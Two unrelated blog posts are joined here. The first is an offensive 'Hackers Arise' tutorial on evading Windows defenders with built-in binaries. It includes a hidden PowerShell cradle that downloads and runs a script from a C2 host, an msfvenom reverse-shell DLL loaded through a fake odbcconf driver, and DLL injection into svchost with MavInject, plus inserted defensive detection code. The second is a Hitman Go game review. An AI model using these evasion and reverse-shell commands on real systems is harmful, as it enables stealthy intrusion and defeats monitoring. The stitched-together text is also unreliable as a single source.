PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders

Welcome back, cyberwarriors!

We hope that throughout the Survival series you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use the knowledge from previous articles to get our job done without drawing unnecessary attention from defenders. All the commands we cover across the two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software acts suspiciously through its process and driver names. Tons of false positives quickly drain defenders, so in many environments you can fly under the radar with these commands.

Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.

Let’s get started!

Execution and Scripting

PowerShell

Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but this isn’t always the case, since it requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why, in one of the previous articles, we learned how to convert .ps1 to .bat to blend in. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it.

Here’s a reminder of how to download and execute a script in memory with stealth:

PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"

Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).

When you would use it: When you need to fetch a script from a remote server and run it quietly.

Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.

A less stealthy option would be:

PS > iwr http://c2/script.ps1 | iex

It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.

CMD

CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.

Here’s how to chain enumeration with CMD:

PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"

using cmd to chain commands

Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.

When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.

Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.

cscript.exe

This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly, we will use it to bypass .ps1 execution monitoring. Below, you can see how we executed a JavaScript script.

PS > cscript //E:JScript //Nologo C:\Temp\script.js

using cscript to load js files

Walkthrough: //E:JScript selects the JavaScript engine, while //Nologo hides the usual header banner. The final argument is the path of the script that will be run.

When you would use it: All kinds of uses; with the help of AI you can write an enumeration script.

Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.

wscript.exe

By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.

PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B

using wscript to run vbs scripts

Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.

When you would use it: Same thing here; it really depends on the script you create. We made a system enumeration script that sends its output to a text file.

Why it’s stealthy: Runs without windows and is often used legitimately.

mshta.exe

Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.

PS > mshta users.hta

using mshta to run hta scripts

Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.

When you would use it: To run a seemingly harmless HTML application that executes shell commands.

Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.

DLL Loading and Injections

These techniques rely on legitimate DLL loading or registration mechanics to get code running.

Rundll32.exe

Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.

C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry

using rundll32 to run dlls

Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.

When you would use it: To execute a DLL’s code in environments where direct execution is restricted.

Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.

Regsvr32.exe

In plain terms, it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another, less frequently used way to execute DLLs.

PS > regsvr32.exe /u /s .\reflective_dll.x64.dll

using regsvr32 to run dlls

Walkthrough: regsvr32 is asked to load the DLL; /u requests unregistration and /s makes it silent.

When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.

Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.

odbcconf.exe

Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell:

bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll

generating a dll file

PS > odbcconf.exe INSTALLDRIVER "Printer-driverX|Driver=C:\file.dll|APILevel=2"

PS > odbcconf.exe configsysdns "Printer-driverX" "DNS=Printer-driverX"

creating a fake driver with odbcconf
receiving the connection back to the C2

Walkthrough: The first odbcconf command tells Windows to register a fake database driver named "Printer-driverX" backed by a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs the reverse shell inside it. The second odbcconf command creates a system data source (DSN) named "Printer-driverX" tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.

When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.

Why it’s stealthy: odbcconf is a legitimate Windows tool rarely used outside database admin tasks, so on most systems it’s not heavily monitored by security tools or admins. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.
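Added defensive example, not code from the article: the two odbcconf commands above persist the fake driver and its DSN in the registry, so a responder can audit those keys after the process is long gone. The block parses `reg export` style text of the ODBCINST.INI and ODBC.INI keys and flags any driver or DSN whose DLL lives outside the Windows or Program Files trees; the sample export is constructed and the trusted-directory list is an assumption.

```python
# Added example, not from the article: audit the registry artifacts that the two
# odbcconf commands above leave behind. Assumes the ODBC keys were exported with
# `reg export` into .reg text; the sample below is constructed, not a real export.
INST = r"HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI"   # driver registrations
INI = r"HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI"        # system DSNs
TRUSTED = ("c:\\windows\\", "c:\\program files")           # assumption: where real driver DLLs live

def parse_reg(text):
    """Parse .reg export text into {key_path: {value_name: string_value}} (string values only)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, value = line.partition("=")
            if value.startswith('"'):           # .reg doubles backslashes in string data
                keys[current][name.strip('"')] = value.strip('"').replace("\\\\", "\\")
    return keys

def audit_odbc(keys):
    """Return (name, field, dll_path) for every driver or DSN whose DLL sits outside TRUSTED."""
    findings = []
    for name in keys.get(INST + "\\ODBC Drivers", {}):        # every registered driver name
        vals = keys.get(f"{INST}\\{name}", {})
        for field in ("Driver", "Setup"):                     # both values name a DLL to load
            path = vals.get(field, "")
            if path and not path.lower().startswith(TRUSTED):
                findings.append((name, field, path))
    for dsn in keys.get(INI + "\\ODBC Data Sources", {}):     # every system DSN
        path = keys.get(f"{INI}\\{dsn}", {}).get("Driver", "")
        if path and not path.lower().startswith(TRUSTED):
            findings.append((dsn, "DSN Driver", path))
    return findings

# Constructed sample export: one genuine driver next to the fake one from the article.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\ODBC Drivers]
"SQL Server"="Installed"
"Printer-driverX"="Installed"

[HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\SQL Server]
"Driver"="C:\\Windows\\System32\\SQLSRV32.dll"
"Setup"="C:\\Windows\\System32\\sqlsrv32.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\Printer-driverX]
"Driver"="C:\\file.dll"
"APILevel"="2"

[HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources]
"Printer-driverX"="Printer-driverX"

[HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\Printer-driverX]
"Driver"="C:\\file.dll"
"""
```

Calling `audit_odbc(parse_reg(SAMPLE_REG))` reports the fake driver twice, once from the driver registration and once from the DSN that points at it, while the genuine SQL Server driver stays quiet.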

Installutil.exe

Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.

PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll

Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.

When you would use it: It’s useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.

Why it’s stealthy: Install utilities are commonly used by developers and administrators.

Mavinject.exe

Essentially, it was designed to help with Application Virtualization, where Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe. Here is how it’s done:

PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll

using mavinject to inject dlls into processes and get a reverse shell

Walkthrough: This targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.

When you would use it: To inject a DLL for a high-privilege reverse shell, such as SYSTEM access.

Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.
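Added defensive example, not code from the article: the detection logic a SOC would derive from the command lines in both sections above (script execution and DLL loading), run over constructed Sysmon-style process-creation events. The rule names, the event text format, the trusted-directory list and the sample lines are my own assumptions; the command lines in the samples are the article's own plus one benign cscript run for contrast.

```python
import re

# Added detection example, not code from the article: command-line rules for the
# LOLBin invocations walked through above, written the way a defender would encode
# them for a SIEM. A rule fires when the image basename matches and EVERY
# command-line regex in its list matches (case-insensitive).
RULES = [
    ("ps-download-cradle", r"powershell",
     [r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", r"\biex\b|invoke-expression"]),
    ("ps-hidden-bypass", r"powershell", [r"-w(indowstyle)?\s+h(idden)?\b", r"-e[a-z]*\s+bypass"]),
    ("wsh-engine-or-batch", r"[cw]script", [r"//e:|//b\b"]),
    ("mshta-hta-launch", r"mshta", [r"\.hta\b"]),
    ("regsvr32-silent-unreg", r"regsvr32", [r"/s\b", r"/u\b"]),
    ("odbcconf-driver-load", r"odbcconf", [r"installdriver|configsysdsn|configdsn|regsvr"]),
    ("installutil-uninstall", r"installutil", [r"/u\b", r"/logfile=(\s|$)|/logtoconsole=false"]),
    ("mavinject-inject", r"mavinject", [r"/injectrunning"]),
]
# rundll32 and friends are too common for pattern-only rules, so additionally flag any
# DLL argument that does not live under the Windows or Program Files trees (assumption).
LOADERS = r"rundll32|regsvr32|odbcconf|mavinject|installutil"
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files")

def parse_event(line):
    """Split a Sysmon-style text line ('Image: ...<TAB>CommandLine: ...') into its fields."""
    fields = dict(part.partition(": ")[::2] for part in line.split("\t"))
    return fields["Image"], fields["CommandLine"]

def untrusted_dll(cmdline):
    m = re.search(r"[a-z]:\\[^\s\x22,|]*?\.dll", cmdline, re.I)   # first absolute DLL path
    return bool(m) and not m.group(0).lower().startswith(TRUSTED_DLL_DIRS)

def match_rules(image, cmdline):
    """Return the names of every rule that fires for one process-creation event."""
    exe = image.rsplit("\\", 1)[-1].lower()
    hits = [name for name, img, pats in RULES
            if re.search(img, exe) and all(re.search(p, cmdline, re.I) for p in pats)]
    if re.search(LOADERS, exe) and untrusted_dll(cmdline):
        hits.append("lolbin-untrusted-dll")
    return hits

def scan(lines):
    """Return (rule, command line) pairs for all hits across a batch of event lines."""
    return [(rule, cmd) for img, cmd in map(parse_event, lines) for rule in match_rules(img, cmd)]

# Constructed sample events (not real telemetry): the article's own command lines
# plus one benign cscript run (slmgr.vbs) that must not fire.
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tCommandLine: "
    "powershell.exe -nop -w h -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')\"",
    "Image: C:\\Windows\\System32\\cscript.exe\tCommandLine: cscript //E:JScript //Nologo C:\\Temp\\script.js",
    "Image: C:\\Windows\\System32\\cscript.exe\tCommandLine: cscript.exe C:\\Windows\\System32\\slmgr.vbs /dlv",
    "Image: C:\\Windows\\System32\\odbcconf.exe\tCommandLine: odbcconf.exe INSTALLDRIVER \"Printer-driverX|Driver=C:\\file.dll|APILevel=2\"",
    "Image: C:\\Windows\\System32\\mavinject.exe\tCommandLine: MavInject.exe 528 /INJECTRUNNING C:\\file.dll",
]
```

`scan(SAMPLE_EVENTS)` fires two rules on the PowerShell cradle (the download-and-iex pattern and the hidden-window/bypass switches), one on the cscript engine override, two each on odbcconf and MavInject because both also load a DLL from the root of C:, and nothing on the benign slmgr.vbs run.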

Summary

Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces the forensic footprint and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape their detection strategies. But as mentioned earlier, monitoring system binaries might generate a lot of false positives.

Resources:

https://lofl-project.github.io

https://lolbas-project.github.io/#

The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.

Hitman Go: When a Deadly Action Game Turns into an Elegant Board Strategy!

When talking about the Hitman game series, what usually comes to mind first is tense stealth action, executing targets in all sorts of creative ways, and challenge-filled adventures in the style of Agent 47. In 2014, however, Square Enix Montreal tried a new and unusual approach that surprised fans by releasing Hitman Go, a spin-off that turned the intense action formula into an elegant, puzzle-filled board-game-style strategy game.

Hitman Go is not just a small experiment; it is a major transformation in how the Hitman franchise is understood. The game successfully combines stealth, strategy, and puzzle-solving in a minimalist yet highly addictive package. Originally designed for mobile platforms, Hitman Go later arrived on other platforms as well, including PC, consoles, and VR devices. With its unique visual style and simple yet challenging gameplay mechanics, Hitman Go delivers an experience that feels genuinely fresh to players.

Minimalist Visuals with an Elegant Touch

The first thing that catches the eye in Hitman Go is a visual style that differs greatly from the main Hitman series. Instead of a realistic, detailed 3D world, Hitman Go comes with a minimalist, elegant board-game aesthetic. Each level is presented as a board-game diorama with miniature figures representing the main character, enemies, and environmental elements.

The design pays close attention to detail, such as the wooden table, character pieces that look like plastic figurines, and board backgrounds that look like softly lit rooms. This visual style creates a calm, relaxed atmosphere while giving an exclusive feel rarely found in other strategy games.

The colors used in Hitman Go are also very effective at conveying the game's message and objectives: players can easily recognize the important elements in the game, from enemy positions and goal locations to the various other obstacles. This simple but stylish look is one of the main attractions that let Hitman Go catch the attention of many gamers who are usually not interested in the strategy genre.

Brain-Sharpening Puzzle Gameplay

Although it comes in a simple form, Hitman Go's gameplay should not be underestimated. The game is designed with a gradually increasing difficulty that forces players to think hard to complete each level. The player controls the Agent 47 figure on the game board, where every move is made in simple steps, like a pawn in chess.

Each level consists of predetermined paths, complete with guards that move automatically following set patterns. The player's task is to find the best way to reach the target or final goal without being caught by enemies. Though it looks simple, the puzzle mechanics in Hitman Go are very challenging and require careful planning before the player moves.

Each level usually has several extra objectives, such as finishing the level within a certain number of moves, not killing any enemies, or collecting a hidden item. These extra challenges give the game high replayability, since players will keep being tempted to replay levels for a perfect score.

A Clever Adaptation of the Hitman Series

Hitman Go is not merely an ordinary puzzle game using the Hitman name to attract attention; it is a clever adaptation that keeps the essence of the Hitman franchise intact. The stealth and strategy elements at the core of the Hitman series remain strongly present in Hitman Go. Players still have to think carefully before acting, plan every step with precision, and use various tricks and strategies to outwit enemies.

Signature Hitman elements such as disguises, throwing objects to create distractions, and executing targets in creative ways are still available in a more minimalist but effective form. This keeps long-time fans of the series feeling at home while also introducing new and interesting aspects.

For new players who have never encountered Hitman before, Hitman Go also serves as a perfect introduction to the core gameplay of the franchise: strategic planning and a clever stealth approach.

Music and Sound Effects That Strengthen the Atmosphere

Besides the visual and gameplay aspects, Hitman Go also offers very good audio quality. The background music is deliberately minimalist, with soft but tense tones that reinforce the game's atmosphere of strategy and puzzles.

Sound effects such as footsteps, alarms, and the sounds of character figures moving and interacting with objects on the board are crisp and clear, adding to the sense of immersion. Even without dialogue or spoken narration, Hitman Go manages to convey the story and the situation in each level effectively through a brilliant combination of visuals and audio alone.

Portability and Comfortable Play

Originally designed for mobile devices, Hitman Go is very comfortable to play in all sorts of situations. The turn-based gameplay design lets players enjoy it in short sessions as well as long ones. This makes it an ideal choice for those who want to enjoy a high-quality game in limited time, such as while traveling or simply filling spare moments.

When Hitman Go eventually arrived on PC and consoles, the simple yet deep gameplay still felt comfortable to play thanks to intuitive, responsive control design. The VR version even adds a new dimension that makes the experience more unique and memorable.

Conclusion: A Successful Experiment That Became a New Favorite

Hitman Go is clear proof that even a popular franchise can succeed when adapted into a completely different genre, as long as the execution is clever and creative. Through its elegant minimalist visual design, brain-teasing puzzle-strategy gameplay, and impressive audio, Hitman Go delivers a unique and enjoyable experience for fans of the Hitman series and new players alike.

For gamers who want a different kind of challenge or are simply looking for a light game that still tests their intelligence and creativity, Hitman Go is clearly a highly recommended choice. It is a spin-off that is not only worth playing but also an example of how innovation in the game world can be done very well.

The post Hitman Go: When a Deadly Action Game Turns into an Elegant Board Strategy! appeared first on Informasi Untukmu Seputar Game PC, Mobile Sampai Konsol.
